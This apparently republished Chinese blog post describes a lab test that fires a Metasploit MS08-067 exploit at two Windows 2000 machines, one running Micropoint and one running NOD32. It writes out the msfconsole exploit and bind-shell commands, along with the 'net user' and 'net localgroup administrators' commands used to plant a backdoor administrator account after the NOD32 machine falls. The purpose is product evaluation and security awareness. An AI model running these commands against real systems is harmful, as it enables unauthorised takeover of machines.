计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御
前言
媒體上關(guān)于系統(tǒng)漏洞的話題一直不斷,在我所接觸的用一些朋友和用戶中雖然也知道打系統(tǒng)補(bǔ)丁很重要,但卻又一直不以為然總以為網(wǎng)絡(luò)上的危險(xiǎn)離自己很遠(yuǎn),大部份人都認(rèn)為進(jìn)行一次遠(yuǎn)程***很困難甚至認(rèn)為只要安裝了防病毒軟件就一切大吉,是不是這樣呢?讓我們看看今天的操作。
主動(dòng)防御技術(shù)通過微點(diǎn)推出后給現(xiàn)在的安全界注入了一針興奮劑,現(xiàn)在各大廠商都宣傳自己有了主動(dòng)防御技術(shù),而網(wǎng)絡(luò)上針對(duì)它的宣傳也是毀譽(yù)參半。 一切都以事實(shí)為主,有圖有真相。
測(cè)試環(huán)境
Metasploit
操作系統(tǒng):CentOS5
軟件版本:framework-3.5.0-linux-i686.run
IP 地址:192.168.0.10
Metasploit(http://www.metasploit.com/framework/download/)是一款開源的安全漏洞檢測(cè)工具。由于Metasploit是免費(fèi)的工具,因此安全工作人員常用Metasploit工具來檢測(cè)系統(tǒng)的安全性。Metasploit Framework (MSF)是2003 年以開放源代碼方式發(fā)布、可自由獲取的開發(fā)框架,這個(gè)環(huán)境為***測(cè)試、shellcode 編寫和漏洞研究提供了一個(gè)可靠的平臺(tái)。它集成了各平臺(tái)上常見的溢出漏洞和流行的shellcode,并且不斷更新,最新版本的MSF 包含了180多種當(dāng)前流行的操作系統(tǒng)和應(yīng)用軟件的exploit,以及100多 個(gè)shellcode。作為安全工具,它在安全檢測(cè)中起到不容忽視的作用,并為漏洞自動(dòng)化探測(cè)和及時(shí)檢測(cè)系統(tǒng)漏洞提供有力的保障。
微點(diǎn)主動(dòng)防御軟件
操作系統(tǒng):Windows 2000 SP2
微點(diǎn)版本:2010-12-09
IP 地址:192.168.0.200
NOD32環(huán)境
操作系統(tǒng):Windows 2000 SP2
軟件版本:2010-12-09
IP 地址:192.168.0.100
操作步驟
搭建測(cè)試環(huán)境
按簡介中的說明搭建相應(yīng)的測(cè)試環(huán)境,保證三臺(tái)機(jī)器都能相互通訊,有關(guān)實(shí)驗(yàn)環(huán)境的搭建方法可以參考利用單主機(jī)搭建和物理機(jī)器通訊的測(cè)試網(wǎng)絡(luò)這篇文章。有關(guān)Metaspolit的安裝方法網(wǎng)絡(luò)上有很多,其方法也不復(fù)雜。
查看本地用戶
在安裝了微點(diǎn)主動(dòng)防御軟件的計(jì)算機(jī)上打開“用戶管理”查看本地的所有用戶。
對(duì)微點(diǎn)進(jìn)行溢出***
登錄到安裝了Metasploit的系統(tǒng),同時(shí)運(yùn)行以下的命令啟動(dòng)到Metasploit程序,同時(shí)設(shè)定調(diào)用的溢出漏洞為MS08-067,遠(yuǎn)程主機(jī)為192.168.0.200,本地聯(lián)接端口為5555,如下圖所示。
msfconsole
use?exploit/windows/smb/ms08_067_netapi
setPAYLOAD?windows/shell/bind_tcp
setRHOST?192.168.0.200
setLPORT?5555
exploit
查看***結(jié)果(微點(diǎn))
輸入上述指令后,本地Metasploit會(huì)提示溢出結(jié)束但未能取得會(huì)話權(quán)限,而此時(shí)微點(diǎn)已檢測(cè)到溢出***,同時(shí)還給出了遠(yuǎn)程***者的IP地址,證明安裝微點(diǎn)主動(dòng)防御軟件后能有效防止溢出***。具體如下圖所示。
對(duì)NOD32進(jìn)行溢出***
登入Metasploit重新設(shè)定遠(yuǎn)程***的主機(jī)地址,因開始已指定了具體的溢出漏洞,這里只需要重新設(shè)定遠(yuǎn)程主機(jī)地址就可以了。具體指令及截圖如下所示。
unset?RHOST
setRHOST?192.168.0.100
show?options
exploit
查看***結(jié)果(NOD32)
在輸入上述指令后會(huì)提示已獲取遠(yuǎn)程主機(jī)的管理權(quán)限,此時(shí)在遠(yuǎn)程管理會(huì)話中輸入相關(guān)指令在計(jì)算機(jī)中新增用戶并賦予其管理員權(quán)限,具體指令及截圖如下所示。
netusertest?123?/add
net?localgroup?administrators?test?/add
測(cè)試遠(yuǎn)程添加的用戶
為了檢測(cè)溢出***的作用,打開“用戶管理”界面時(shí)會(huì)發(fā)現(xiàn)已新增test用戶,同時(shí)可以使用該用戶登陸系統(tǒng)且擁有管理員權(quán)限,如下圖所示。
后記
從上面的測(cè)試可以得知微點(diǎn)所宣傳的防止溢出(漏洞)***確實(shí)是有效的。以下是關(guān)于該功能的描述。
“本發(fā)明涉及計(jì)算機(jī)緩沖區(qū)溢出***的檢測(cè)方法,即,通過建立勾掛函數(shù),檢查線程所建立的堆棧幀的返回地址,并根據(jù)該返回地址判斷是否發(fā)生緩沖區(qū)溢出,并在發(fā)現(xiàn)緩沖區(qū)溢出后,將引起該緩沖區(qū)溢出的線程結(jié)束。利用本發(fā)明的緩沖區(qū)溢出***的檢測(cè)方法,不但可以高效、準(zhǔn)確的檢查出惡意程序的緩沖區(qū)溢出***,而且避免了現(xiàn)有技術(shù)中的殺毒軟件對(duì)新生病毒特征代碼獲取的滯后性,和防火墻系統(tǒng)使用時(shí)的繁瑣以及給計(jì)算機(jī)知識(shí)很少的用戶帶來的麻煩。即使對(duì)于新生的緩沖區(qū)溢出***的病毒、***也可以準(zhǔn)確、高效的進(jìn)行攔截。”
“申請(qǐng)(專利)號(hào):200510007681.5”
聲明
本文的目的絕不是為那些懷有不良動(dòng)機(jī)的人提供支持,也不承擔(dān)因?yàn)榧夹g(shù)被濫用所產(chǎn)生的連帶責(zé)任;本文的目的在到最在限度地喚起大家的網(wǎng)絡(luò)安全意識(shí),正視我們的網(wǎng)絡(luò)世界所面臨的一聲危機(jī),并采取行動(dòng)。
總結(jié)
以上是生活随笔為你收集整理的计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 混合模式程序matlab,VS2013
- 下一篇: OpenAI Dota2 5v5模式击败